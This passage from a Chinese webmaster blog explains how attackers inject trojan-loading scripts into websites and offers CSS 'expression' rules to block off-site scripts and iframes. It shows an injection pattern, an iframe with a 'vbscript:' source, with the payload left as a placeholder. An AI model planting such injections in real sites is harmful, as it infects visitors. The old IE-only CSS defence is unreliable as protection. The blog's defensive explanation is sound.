马海祥博客提示:黑客还可以根据情况随机变换插入的JS挂马方法,例如黑客有可能会将脚本写为: <div > 或者: <iframe src="vbscript:[挂马脚本]"> 二、如何防止网站被黑客挂马? 防第一种JS挂马方式,不方便,用得非常少,而第二种JS挂马方式才是当前主流的,所以我们主要针对它进行防御。方法就是阻止Src请求的异地外域的JS脚本,代码如下: iframe{mdy1:expression(this.src='about:blank',this.outerHTML='');} script{mzm2:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');} 不过这种方法的缺点就是网站的访问者将不能看到被挂了JS木马的相关网页。 所以我们为安全工程师提供了一段可以中止JS脚本运行的CSS代码,这段代码会让异地外域的JS文件在使用document.write()时,被 document.close()强制关闭。这个时侯JS挂马的内容往往还没有来得及写完,只有部分被强制输出了,Writer后面的内容再不会被写入访 问者的电脑中,从而起到防范JS脚本挂马的作用。 让JS木马的进程迅速中止 在 <head> </head> 之间加入如下代码: 屏蔽script和iframe <style type="text/css" id="LinrStudio"> /*<![CDATA[*/ iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');} script{ngz1:expression((this.src.indexOf('http')==0)?document.close():''); /*]]>*/ </style> 单屏蔽script <style type="text/css" id="LinrStudio"> /*<![CDATA[*/ /*iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}*/ script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');} /*]]>*/ </style> 如果有朋友发现自己的网站有被挂马的现象,不妨用这种方法试下。由此可见,平时检查代码是维护网站的重要部分,而代码的简洁性又是至关重要的。对于如何优化网站代码,有兴趣的朋友可以试下:CSS在线压缩软件 CSS代码在线编辑器 本文为马海祥博客原创文章,原文网址摘自于http://www.mahaixiang.cn/js/134.html